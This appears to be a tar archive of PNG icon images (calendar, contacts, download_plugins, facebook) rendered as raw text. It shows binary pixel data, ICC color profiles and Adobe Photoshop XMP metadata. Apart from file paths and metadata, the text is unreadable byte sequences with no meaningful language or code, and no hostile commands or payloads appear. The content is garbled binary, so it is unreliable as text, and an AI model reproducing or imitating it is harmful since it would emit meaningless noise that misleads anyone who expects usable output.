��Ǚ�"r�AV�CӺHZ9L���Ђ_P�^	'��^�H��~���DH�)H��2K�2Y�k���ӏ��@�1�St�;s�ÔJ�pRE�=9�v>E@d���*��B󣁼��5� ;e��F?{��<[��ý"T](4c��0+^��3�N��H���2��ܰ�	��-g�K��4�I�+�>��Ÿ��Uu�Qp�2��U�׷(��q0��/��O�]��
�]�6�����Q��4�S�#��UM��L�((XI�0�Q��y�|v
�݀�T��^�3�Db��@���9��ӹ�̖v�!8��K�EU�<�1v|-g=L,����>Ec��Nc�S�Ϧ�L!B8�I�b��Vu�K`�+�ԇr��B0�L�|�ϟH��	�¬,8�Y���`��8���<l�M���<����i���~ V���u�N�c�����\h8^9(*�7�(�[�t��R[p��ƽ����H�;2+��(캙F᫮9<n���x�Eu�E-&�XP0�u�h�:�_�p<�
��W4��V�B��X�	��T@���4A|ף�u��H�<�Fȱ���"��Щ���S������kG��
�Lf-d�b4m��za"M/�dŸU�D�q�Jt�L�
�1��LF�
[��(�~����I��bS�mэ�B*�^��G�őv�,����lg�T��:<v]tAs�jM0"��Jw�*�h���@̠Mױә(2ig�<�w�~���.���ޜO- y�S�����vRh=@N�H �2���b��T�"A�ͭ:� ���z/����۳���C<ܤ�����T�+��k�K�I%�3;��QՎ��DPnO��u,�S(���q}F&C��h�n{�nzf,%���$�g'rb:a?� �X���b\����="$M�g)�L����q�[��z�FL�l�r��z@Q�)�l<�w�Ua�l���*���L����x�h(H}�"��1H����3tl:C����x<Ocs:�̊�8�
Qz�y�4s���\�fS97�;5��۪�z�i=��:�^_�(�,!gÕ�7F5Fr���x�����`��-�,�(�EҬ��.�!�Wk{C���A��84	9�'�%)�f�3�2�J�t"M����)�;m�ӊ�'�li�jL!JK�(+O4���Aj��|S<�{I��;�<&b&U����'����Ll�w�H���ѵ�	�24,���q:9�f��R���Vw�:rLJ-��D�q�@�p��lf�b��ɬ���~��gM��<وDxŚLE���@���a^������xB�����=�X��c1�L��j�C�}P<�
P<����%}��N���ܱd��,�����`�t1O�Mg�b��i���	ʋ0�{����u+j�/ �0E��gӠ�A~K
���N�,��o��ēa�o��퍈����$�)�1T�+U�J[�R�J�H
�w�>���6

^�L�e�h�|TK��5��0���xV���%I1�	R�fF+���p��:(?��\���n�m��W����.�e%5�e^-M�Cy�&WD<���1J�R�SO�J+��)E�~�JPw���q�(+���f�璯Er__p���C��0;;+���@�R�ɢ���a(O��b:�:V�k\�\($ݳݗC�E%?���L�1333�>}��
oh��ˀ�їrg��m��I~ТWݕI�Vy�2C:==-Ļ2N����
�����`:�c��Ōk�޽ܕ!֐�y��T���͛&�&�j/\�h�4�������@N�\��	�#�`�X�l.2/Q�%�|���m�x���䗎a�̔UX���������o��љ���_j����}�t(5X�%�Z
�*o�5q�}�t ����l)(��O����z��tG�P�� �Y�#��`)��W��BF5��S�[^2P��7x����1���m����@~���x�;�P�W��F�*�%���M做`
����/ث�;���֗���\��i�z5_S�\��aO����W_{�t,�oGo��K0xA�W�%0�2K7�>ܠoF���)U����z�n�!e?��gW� �N�t,�����k�ukv�5�p�́@�ȵ���z�#
��dT�� ���ڭ�c���Ǎ��;���E�	T9��J*��F�A�%�y(��y@H����H�����V�C;F��C�V�}��;��!j���<��@��c1������݀�}`49�J:�U�_�����/�&ʷ�P=8�-r����NLy����\��'}!�6Yn�CF���rX��3#o�R��� >���j7(��:�7���~��tF_����U�v��R�B0�
������k.�Qc�����ז�k����?��2��(�{�@ �5'g8N�1ٚ���PeV�)�^r���j�{���wy.�����D�,%��w=ձ|�J���=��;���sCW8��Iv��u&�b/��$��
.'�c�1*�!�04���jG9��X`Ҏ���<-r8][A��b�r>�?T�Ôl������8�`�N髲�,��񟓳H̲�e]��e�����Ϩ��8T�5�z�^��Dpx�<��%$���T{�_�|����Y
OI��>�.*�v�f�z��	)_�Z��;��Q,���c����~DG��Y�e�G����A����k�9� (g�v���oǻ$�d�x�
5�0N����v{�*P��3+}�]T���>H��2G%����Z��*λ�\9���]�NJ�U󽅗t�W��z����{���vk�f���[
�k(���M�)*��TZ�f! T�i/pY\^�|��e��o�5pw%�Bnu(��A��V��Z�����˕]��U���x]�.W��((V�2�N�
����
�!h��\��Z@(7%���r���F��|�mȊ�s����4ez��y3�M��Ro��n2�+�mzrR�<��ת|���Z��Zyܕ�C���^���^�M-z5wyM�;3&g[�)Z%E��UX1?�S��rJt��v���|�p� �n�D���)L@��3j�ߨ�49����q��?��/���~�A�~�Aᗶ��`�f�eBꀣIEND�B`�featured/images/calendar.png000060400000005741152434416630012102 0ustar00�PNG


IHDR��

7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs.#.#x�?vPIDATx�c���?2صk�U���̀�R�����P�q$
2@��y��mb�@�
*���I�R'ƂC��@����t<�p���	��0@��n�p�M���;�������U�R
��@��T�� .a�$�(4���B���X�1@b��W�) b ~į�r!L��P6H�o�KC>����(F����X�����@������	lq(ĭPC{�x�uL@T�C}���.yĮ�������G���X�
e�Bif f�@��>��)[qDȅd�����H��JKs)4@%�W�FU��!NIEND�B`�featured/images/contacts.png000060400000026616152434416630012153 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:27CFA901DFAC11E5871FF290852D2D22" xmpMM:InstanceID="xmp.iid:27CFA900DFAC11E5871FF290852D2D22" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�H�)�IDATx��}y�\�y߯��3{8vq�/��@��.�R�bŲs8���Nʱʱ\�KV�*�U�aI�,GVEI�|�6�%)R\�ˉ$��"%J"M@$��޳s��|_���9vvgfwL�>v�7o���w��BJ��{8�)�(c���b0��(cKF�&��;�n!:D��h7Ѥ&��,Q��JT ��k�Bt������"=�B�Ko�z��u]�����Z�����5�|�J���o߾�SD�%zѫ��&����ߓ��D�_�����E�uM�n�I7@��^��'z��mR�.����$	>O�O\ϒ�z�q�_&�%�vԠ9}���W��?�?������?'�U���w�
��J����O�a@ћ1���D�G��sL`x��j��Iz*��A��]R�ޡ���^��0^��8��GR�ԹX,���
���_!z���y�!0��'������ǿۉ<�i7t?ѷ����1p�� 0�����=��|���f�F���#:��`h���ߠ�?����

����������pH����iz�'���1����Lt7鰀R'�_��އm�6o�K:M�7��`����R���_�����fgg[��hd��3�S��3,��b����Y}�#�G�h�N�
�3�=����۴��X�90���0>Cj�m&M�j7�J}���vo�e`cD��T���~�V��w��1��1xh`�!�~2>�gﻞA�[@tV%�����>z=���}x�����Tʸ�.����ҧ�'P��?�uP�p���H�B8>Q�T.��_���D���/
��SG>�#�I����kP�u�Y����h��?GL۩�`U�5�G�ۚ����?'F��
�4~n����/X�X�x3=�~�Sj�=J��oD�ד��?_y�,�W
�9B�M�q�²����\�E�𿑮�_�G��#O�[��Z\�[�z/�'RiĈ��RN�Vzn�f"r3�7�R1�{t�;��d�e���V�(
�����EJOu2�ǎ��$��~��b�����,�w�e��uĄ�Z/�sHK�((��D;X'�����)������k�?�[L��o�w�j](x�hr�$jU���,��G.��ؾ��_D���D'���v��-������_��Z�tu�-O���ڶ@�l��:�k_�>�_���z|PH�t%DX_s	?�xb� �!�w��""NR����GB�N|�V��Xq��wu�00Xj8�y��_����_�SMz"�Dr]E����Yi����/"���'�/���|)\�Mҋ0��RR@�?�R�S����N���H;I��Ŋ[F"C�X��Zi�n��$)�Eĵ*?�.P��V���Z��4M����A�׶�%�#ؐڈ�ֳZ0s����Y�R�H���!C�$(!5�@|h��/�;�##}̝:,-�x,���q�I��3�H�HP��^z�v��s�oꧥ�U0w�"�z	Z���+��Lㄷ]�R+1
���D�o�kH}e��&�5"2&=��
ź���	�T�C��$��20����/��w8»�
���`���A��cF[
�\��5��b�����$]����H����P`3 �F�D��f�2}P����C�!��Wv�z�@s-��U��Q��������Fb�Q��p	�K�ԣP���ݟkt5�=��k(�pQ�̆����-��?H�xm��
�&ߞ�o<?�]\��_Q̌��$Q#F\-�8��{c�
k}m�R�&��p�_a����k�Vq,���B]0�#����	y�!�jw�%�b������$K���5T���u�ڵ1�-�}��9z��¶�`�&o���d+@��yO/��g�Y��y��A�\�jy����Lz,�"����B�yQ)"�7X6�@�^�؈u̧<@8V�B�}e�j�	�F���j�	'Y��rdT�Q^|�3<��P�CꈥQlsq#[Zp�2���pA�ߠ��Gz	�+���5���J�)�Nx�"vA]����@a��}m�D�J!'U3�i�mDc^>� ҡ�Mx�`�^��S8�yN�W�~?�1K��M��&o*�Fy�2i��g�u(��1�~6�aI��j��äB~I��
���}<�J�D�~��V�d�K
���D�@�fo��n����lC 4x�R��p-i�l^=�5M�gȓ�;�	�@vku�O)�UH�׆�h�ۀB����7(�!��#��x�<�	 `,t#
dçE(��s�!%-U�D���Lw"�ԇ��,P���q��+��O�t���,+W��*��1�=�͗��׀B��]���F�/��֯(���P�A:��цe�ʍF��� �`e/Tp)��0��.���1?Ґ>B�e�2�b��+�7{v�'
��*��t=ꕲg7�M�*CʮK�lb@����Z�@1A�O��2f�f�������`�KN�HH�1tm�6�Z+�i�FA���c`������gh�>�u�Ӳ;���Oq¬^���I�����짶!{S�&q�z
�ٯ��ѣ�A熝�0�eؔ�'G}wS3��J랥o$��d=��~��?�8N !��~Ҷ"�TQ�)b��n��@ኄ�;tB���a]�[Rh�q�z
���/v�a--����M�u�o٘琚a�[�5/��J]-��;��gb� ��~�''N:�Dz�Q���08"J�P1X�j����DC]0q�"t�dW%�*��͈�ڥ��^��$����!sPj�3_bȦ
ė1�j�.ɠ��W�_�4"�8~��s{���qB"�QH�r%'�b	 ^�BX�Bhf�K髳pER�;���TK�g��ۿ��]]�[Zm#��Z��b�@���-��/R�s�]R�q�:���V��<@�d�*���_E�� 떐����(*H�Ҏ�PI��Z=�<��ŒD�.��c*��H�I���zJ
���OǷA�@R��	�t��
�
�	�#�B2�����E��&�x�@��2;��W�v"ӱ��A�:�̀���+�C�[E�����Lc��1��b|(�\&'�;�%�j��+%�����.
�*2�$�i�n2����$��ۓFJm�z^�����˝��n��[�0�Ϧ`�(��l`p�|�@�&�I�y4&�î�q�D�0�@E��r�JE=�*�Yx��/��xG��`z�n
��%@�c�t��Wo��4�/��R
?\�[�cm��D}:&R�KX�
�PV_��_�
^#Q���Jw+ĺ����&��i~���6��Nq��?�#}�ᆣў"l��
���/���׮"w��8_�=��-�nC:7�*1�T&�B��_���l:�����]Ý�<�J�]�a�XB�.��5RO�/!d#0���6�	R	]�%t�̓������슬��׺�k�/%\M&$dG���7,��R�z��5R�zGj�%�]~
�O88y���P%W���V�9��)e��q��l�\�j��|���l�&G05\�����\	g�\1U@F��ݍ{��3L��S)�k,S�Wj���}�7#Ӏp�w����z�u�f�H��ʑ
��@¸5eP�D�.`���{o��&f(e	cccE6�E2�P���=\e��I���X�_���"��KM��CȦ��sy�'�#o$K.�H9T�D�H����~h����j0�"L�N�p�c(�
�P�����`0E/VE��b��R+�%*t�$foX�C��wq�t���L�?L�Oa|l�SS�f�j�����Z1z.I��>>1��{�`ii	�\����k$��89�A�V�#�,c�TR�b���Z�	��ix��U���0]�=��"(��{')Nvkhrh{vKĄl��I�*��{������q8S�=�~
3��b����a�9um*�|@H`ޚ�ҹ���,�����(W�85�ť�:��5REe$���S��p��{*T.�l��{ij6�+��|]�,(��"��8j)a�1߈�����nAR"�xS�K8q��r+����I��
N��X�OǏk���5��j���߿���^<{)T�C#8�RÏ8�_C:�t���3�u�XE 1�.�NGz��cG���ނ����q��:n�~l�Y��I?S�Z�y�k/��HϿ�6��r���ه=�z��I��SAN@��a_��v
����?�R��2VɎ�����F@��Sv=9&�H7rP�ۿ%(!�SL��oОGp/��M�q�}0��8�urB�D��l
y]=�b�9g�2���8|�(f�Ә�5�P$��1��Z�����cb&UK���	��M N��d�ci�p�I��<i|#�ރ"� ��Pas.ޕ�
Al��8�
(n��!"A+K�D��V(�0�\@b�
v�ep���޵[m�aF�$����-��r'��V���"|���I��ڕK� �"���’A�ۮ�^�\Q/d�m
3K���cS�}=�b["*����f��7��B�˫��W�w�n왝��а�T��s0�	�U4V^�v/���6F:�è\þ�$�q���fg��`i�� ?���*汫B�Ħ��[x�F8K�O*��1�G�)�!��0����
��T��ՕN�/�
�}�(Dd���I_Z0�ک4�����b�DE�7��:�&�olz�w#@�ԟ����T���w�B�j\;��z���6��*���z�D��c*(����KZB�,��6`��Md��bR�V'쮊I�t�$���= !��
�U�[��m��)�,wk�G���n
�eC�v8�.��fL���d�1���XJDc���B"
CD�a$�
�g:�l�U��Z�����U1ȶ�N+��c�|]�-�A9�h&#dcx���'�L��W�%�\-��P4}^B]S���܈�wb�,7�I�%��`����Vi���e�Q�<�݀b�O��VJ�q?�/f��O�@��'+�N�M�z⛁¬��R�2B��ע�~
�(��ۅ�xM~�4:݊b�:�+B��$|��?n#�m�c�l���Z�rbR*�r>���5�:*H�䈸���6|�4����+��w�ɀ�.իHE޸�x���y(�Ј�h�iȞJ��4?�(���s�Z9�^�b<���U��U���u�7��mH;T����z��U�: i��yj�.VJ5�gF;PDL�`�oD�>�\�	�E���n@Q�n<�����R��8�V�`uiّ1UH�ź>��I"�}���m��O�pC��\E���"��J�mLo+��O�y�6l.	����A���̦(w
F���+fwV�Wj
����-b��eL��S�l���7:��rF��,`uRwվ��L?�Vŏ��d�������}L�>;���dϤ�i�GW��w�=u."��vF���hU�E
�TWKx���[��ȢV�{�6��uD2H7��eK
�7�	���f
�#�q|��y�Ⱦ��+0��V'�'"���U&�+P4��݀b~'Y��`�fRqb|>3��_��.���ê3�[��`����lua���؁*X��"NRb$7��\Z�W��C����$�Lvg��p�\H���w�"6f�n$	�+P���FDT�˶�	v���&��azj���$��e��م��[�N�ٽ'��i��*�"�����ή�<y�N�UO���!�bq
W�bQ��6�E�no���x�P��V�t�S9-��ɘ�Bz�\X���y<pd
	���b	)nS��1���B��P���h�n�<{
߿8�4a,����)Z� M"bv���l:s�J�}K����ƹn@q;}�����0��\�l	�OĽBܵ5�2�G�Gsp!�R\k�n���vy���V���ǓN��FK5!`D�Re�*ԕ�#-�چg�����M$EW�8����}���*"�LF�[U��<��?����u
LJG���]Seu�'��W�k(Q^�v���@$!F��0's��3+x�ܢ��Q�#L��Ph[�-
���H���ջ�:S]^��I�Zm���L7����z��y��$��]�%1��W�Cb�������q��
,5��ܵoc��j��^�=1��7_��{f����d�@�TG�TaK+TmR�y�z���6�eq�m$��W�^�VUt�E����c���(�P]!�2��U��^N����a�H��077�<�C����:,�##�����(���1T[��\�2�����r
�l�\:��ι�]�������!��dJ�a�+�O��R��ﬗQ#s����[�N)�Y�L⾴8GN�E��aw��-�&��qL�ګ�ꪽq"�>W(��*�3��E?����7��^�~ܻo��V��b	g��
e,W+(0�x��)NGr/݆��T�1�P�P0�{Bw��]�C��ns<��� �E82��C����2��^Bn�"f��.?v���蘲�p�ҳ(L��#[���kd{��!�1J���3����$aN,.ṫ<u��s����l6�� z��2����q׊rv�uT��z�mP��U^#��+��z��:�;O�c"&ri�R��T�W
� ER�]Ԙ�(l��qŖ�uT���+��j����2�S8@vŞ�U�^���ke��먥��f���j5e��Tu�Y�^�7)E��O�g'�x\�ʳ�"%�����I:��z���Ǒ��9qn��.L�Q��@�ϧ��U�Y�|D��4R�x v@˒D�;�j�LҡL�
K���R�8L �Z��+��:���?jdߌ�7D��g`u���k2����YT؀h!)
��]��{|}�����d�_%}[YY�{�I�.�ǝG�⮓�p�ې%��k*Y2�#K�.�0@����a�D��
�9��W,��
��,���(��8^�L`2�ģ�V��|��aR'�d��@���PB��Q`����Qm쉯c�������;(Z��U��P]��|�;8(��ԩ��{Ocvv?1=���e�WW��I��,]7s�J��y-��;��X�n�	�UǶ	7>����Ct��l
#g��KE,3F�rd�$��	���ߪ��]�W�,`���I
s�5���x��N��)(����ǾW͕� @$PY������
��>�8�v�٫V��ʊjg�^�)������3�PQ��d��R�v�\]�x����8��by�̭\���/����ȰD"������p�5���m�((����s��Em��nKT�>kA��W]Y�|G�y<p�4�~�سwF�̓H��ΐ�৻50��@�4"�^{M'���n>Bߟ&`��O`�^�
�x�8�=���cu���MN9q�w�;��`�ɦw@T�f�&���3�F@��ᾁB���#@���
��E�>�*�����;�q��iJ�i�+B�s6�Zp,&�	k�����f�����u�;ψ8|����s�<�7W���], �_�(���i�ڸ������
�c`�v�Q��C�A��F�i@��h
{ �`��+���9�<y'���1C6��rI1�a� "����m`�[2D�|��]��*z*_��cjz��5��U��	,��"��!�d"R("���$�zp���>�P,h��־�
xb���֖�"}��qp7��$f�T��
�/V�I f�nS4#�V>3-��7*�����
Dy�Ō�>Z�w��/װgx�$���.���#��4&�}���˺I7��������DW;��F
�O�]}����۹3�MWq���0{� Y�C��ށsk�Y����&��w���#׈�����~w���B���'�v�&�uW��Aک�k*k�6�#�G���M�mV�vl��H
��w���1���[���C�091�ӆdi7�A�T�Џ�@bN�3�����K�@�9L ,���CvhT�v���MfP��I啽$��
�,���^�;�-%8�BJ0���N���&�49�P ��	��Y��٬�c�ކ�ܕ�t��wP� Z�o�g����=���=��B�ʝHq���P����HqϬ�)�/�aj���؝Å���"�ٜZ��1<���dR&矓�ar|cùM��������̀�iދ�#����W��)\���i�<B����GԎF�h$R��R�؂]��䷬w���è
 T׉H�����a�\~��C�ǐ$��|E�I�k�U�.�����R��L�܊��vw
D)q��/{
�
/����k�K����uޞ_X��(�С[1E��C����E�>NҾg6�V��V��7	*�Ǟ�^,B��ww�+��`2S���̗T!p��_yr���ʧp�ன	��էp��
�N�BJ<�Ml芯gĴrOI���&�xo$��V
�׌��g4��c��Kk�G�8���6A�}}�Ɛm"
�T��3�yd��T��
�Na8�Pu1D�O�x�;0�w/&''HE�!�e��Ȋ��j��<џo���������gz#*�j)��
����7Et�����Q.C!i�%Z�^��G!��^
��,�`�ɍ:bO�s��ʅUL%0��c���11��}��!@x�w8�azf��ځ�xm������݀��g��H�yS/����¾�G09��"�nȨ�}M��Ml����a�lN�I��$�:���p+���%oK#�s�AN�q�_��k���A�Vj��;��H|}�<�|]P����?��H?*�
&ܺ7��j	�Y�$J��'L�{2�ln�N��"�*[}�:dW�n.o1L'��;3?ǀH�:�hԵ��o{��e��׻���H
�������FTsg��rم�O�p�l	�"��O�:׎��װ���#f�������4�^2��R��fw�	�b'�Z��l@�0.?H�㾁�V�H%��~�[�1wl�&�t�~��*����)\%�c�p��ƭ
�et4a�N%��q�Q9�ɗ��@HWVWI�1����1��}'Z�
��wۀ0��&�`0��km�.����u6�!1�m���R#���˅
���ec��~���A�FB���W� #�	��a.�>��ՄU��57T���f� AZ6�W{�tU�R�cw؃��cc3�İ�[��f�%3���^'�=~���@���v>~����YΝ�2M�/�E��y���^)��_��P3��dFsJ�xV���F��x�fJ?��n�3�v�l)�Gjv�E��Rt^����ýw߽�	��)$f2�h�7�6~��9�4(��q#R'�L~�&����f�xE�tm����<��&
%f�b�+�b���0��JXLb)S��)�e�iĶ�n2ğ��d��>�����Uld�ڀh�6��6w����M�4	G�FtŘ�xn�0�ˀ���Ea�G��C�|P��F��(z�o�n�Ͼ�c�`�1�|���谽��+��h��a�e@��;3v������4������	�w���0�V�F��;6*;��C������P�I�[2��F?Pv��i�^��� �����~��fR睎Oя�k|Ĭ�^�7ʰSFe������~��f�����ҏ̒%��){�1tm��	N�x�k?�ߠ��>�Ƈ�X�eo&u�e��E�H���޶Jb00�zH������VQ@�i���o}b+��,�F�'
��%��L&��:��a�p;fK���x����L7(x|���St��0��j�]jD��
�6�N����A���<�K���&�aƃ��^�H���`�6&[�Q��`�x�gP�J6�O�D�.ѻ	1�����
�u6���D��&��
�>�:M�{���&�OI�2R��� vV5
{K_��fp���I̶�m=HK����	���J��ٽ
�Dp�-�Mj߀��n"�la�ѻ��������&ѧi"?N�8e��FjD�{n'@���
�=��G�FU(����G숱c��R���x?M�8
���^Ϩ��7H���%a��"ڄ�
.���� n*P�cf>M�����I �4�–ͤ�h���ƟH��V@���݅ή����CD�:'�l�h[ds���~s�����m����o':`����X "r�C'@h��KD�-���
����!�0�qb�?#�Ub��Q4C;p���n�f�v�i�yt���z<�].�FA�c�%m2xB����t����[���G�
����ѪR%/��lx�z��\O��U_+�O�9�Hϝ���o�2ֳ+Z=��S���W�;��7��h5���^b�=��_o���]�	�̌o��b�t
7Ȉ��̘�!h"�!Qn�r'�Q�CD��+�Ѥ���~d��絧p����i>Q�GD/�47r���`ܜcP5P��1�`@1}�_�S�����IEND�B`�featured/images/download_plugins.png000060400000003577152434416630013706 0ustar00�PNG


IHDR�o>/�tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:2418BE55FE1511E49F33AB627D310D3F" xmpMM:DocumentID="xmp.did:2418BE56FE1511E49F33AB627D310D3F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2418BE53FE1511E49F33AB627D310D3F" stRef:documentID="xmp.did:2418BE54FE1511E49F33AB627D310D3F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>|-?��IDATx��Y���@�#DA�_p
z|?����FB $@�DIK<
D�@
E�	qMBMs�	����a4��G��F7�^��Μy���4��B�#�ya~~"�F��2��-z)��1_���т	5�}6�/�;"^_�ؚ�
�Z[�9�l�X'bϔ��3�xY��.�z�A�RY�_�y��s��BY�i�';��pM�P�7��P�1��3�ap���6nu��\%��f���5[=!�A|���2�Ӕ�n7qZ�"�dGqC�8���kJf�	�#xl>�
�� s�� =wp�&;b{kT19θ�-�h��I`���I��~��`�>Z���7�}�7ď��
�=�!�l�`�g�4g�SÑ����Eb^FG�}�����Pd����)��)�F�����G�HkȞ��a��Z}|J"c���!�{���.�ƈ�����kKa�s�] `@��1t�-v-Y5�~���#�u
���M������~E������.����c�,#�.�3��-X�uH4w�8�+�^��o�s�5-���1=�|�R���Q��~�Ҽ�����a�:`���c|^�Ô��̑��%�zD��O+�ǖé)g{6q��P����Wbi�.��q-�2FɲV�d��X��^�rS룪GG~�H8�k��Wnz��~v`U"�����Ik-��-G�Ƕރ�^��㻆/�x�q�򔔿cJ��{�U���c�-���4����i�ӎ�~
�Ԗs�,8�2��Ly���?ûr��\�=l�|Ƣ}�͗��\4��\� �\��ae웙/�E�":�d3\¹QG�����2Y/��q&���#n�m��a�!��]�U�����>��*�K�S�
�,}W)�e�g���\bY�ޢXj�w˞��J<k������crn +9Q��g�Y[���W>��xЍ�Y�X9�Lw`����$u��υ�����w�ϖ�0�ti-���IEND�B`�featured/images/facebook.png000060400000027574152434416630012112 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:9D698BEDDFAC11E5A301E46E910E065D" xmpMM:InstanceID="xmp.iid:9D698BECDFAC11E5A301E46E910E065D" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>#�S+�IDATx��}��y��3;�w��>%�����e��L9q,�)ǖ#K�lW�J�V9�+q9�Te:��U.˲eU��YfT�,ى'4EJ�)�e��I�>�p�n_3������}���.p�Q?fovwv����+cL۴�-�v��MA1mSPL��6ŴMA1mg�.�_�t��H��#�F�!D}PF��ZH�H1�I���E:����h�?�G��2�YOk��O�$}�1��=w>��f�9ю���.P�D��V�� ݀47�	��zG�������B'.�NT���F�7"��ϑH�؏��/�|��gNq���Z��Fz���-հO��,�⟏MA1Y��_!��mt�[���o
��+8؟��a`
